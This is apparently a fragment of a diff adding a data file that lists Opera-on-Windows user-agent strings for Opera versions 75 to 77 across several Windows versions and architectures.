NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 \ No newline at end of file